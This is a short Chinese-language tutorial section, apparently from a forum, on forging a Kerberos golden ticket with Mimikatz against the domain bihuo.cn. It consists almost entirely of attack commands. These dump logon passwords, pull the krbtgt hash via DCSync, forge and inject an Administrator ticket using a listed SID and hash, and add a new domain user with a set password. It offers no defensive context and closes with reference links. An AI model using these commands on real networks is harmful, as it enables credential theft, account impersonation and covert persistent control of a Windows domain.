九,黄金票据
管理员权限执行:mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /domain:bihuo.cn /user:krbtgt
创建黄金票据
1.域名bihuo.cn
2.域的sid号 S-1-5-21-2244602263-1259606959-4127206907-500
3.域的krbtgt ntlmhash值6a4c71ef895a18483f0f03fd3fafd681
4.伪造的用户名
kerberos::golden /domain:bihuo.cn /sid:S-1-5-21-2244602263-1259606959-4127206907-500 /krbtgt:6a4c71ef895a18483f0f03fd3fafd681 /admin:Administrator /ticket:bihuo.kirbi
klist purge 清空凭据
kerberos::ptt C:\Users\bihuo\Desktop\mimikatz\x64\bihuo.kirbi
net user bihuo17_new 123456abcY /add /domain
参考文章:
https://blog.csdn.net/Canterlot/article/details/126694935
https://blog.csdn.net/qq_50854790/article/details/123150372
https://blog.csdn.net/weixin_40412037/article/details/113348310
页:
[1]